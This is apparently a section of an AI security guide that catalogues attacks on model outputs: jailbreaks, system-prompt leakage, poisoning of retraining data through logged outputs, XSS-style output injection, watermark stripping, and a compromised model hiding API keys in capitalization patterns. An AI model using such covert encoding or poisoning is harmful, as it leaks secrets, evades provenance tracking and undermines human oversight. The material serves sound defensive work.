Output Data

The outputs of AI systems include predictions, classifications, explanations, and generated content. These may be stored for analytics, re-ingested for retraining, or consumed by downstream applications. Improperly managed, outputs can leak sensitive information, amplify bias, or become vectors for injection attacks.

Attack surfaces

Sensitive Information Leakage: Models may regurgitate memorized training data or system prompts.

Ex: An LLM outputs fragments of its training set, accidentally revealing private medical records.
Toxic or Non-Compliant Content: Adversaries manipulate inputs to elicit harmful or policy-violating outputs.

Ex: A chatbot jailbreak produces extremist propaganda or disallowed financial advice.
Stored-Output Poisoning: Malicious outputs saved in logs or analytics later poison retraining.

Ex: Attackers repeatedly trigger biased responses, which are logged and later re-used in model fine-tuning, amplifying the bias.
Output Injection: Outputs contain malicious instructions that exploit downstream systems.

Ex: An LLM produces HTML with embedded <script> tags. When displayed on a web dashboard, it executes an XSS attack.
Data Exfiltration via Outputs: Attackers encode sensitive information in model outputs to smuggle data out.

Ex: A compromised model embeds API keys inside subtle variations of generated responses (e.g., capital letter patterns).
Watermark/Attribution Removal Attacks: Attackers alter generated outputs to bypass provenance tracking.

Ex: AI-generated text is paraphrased by another model to strip watermarks, then redistributed without attribution.
Malicious Fine-Tuning via Outputs: Outputs captured and fed into future fine-tuning cycles carry attacker bias.

Ex: Attackers trick an AI assistant into repeatedly outputting toxic completions. These completions are logged, used in reinforcement learning updates, and reinforce the toxicity.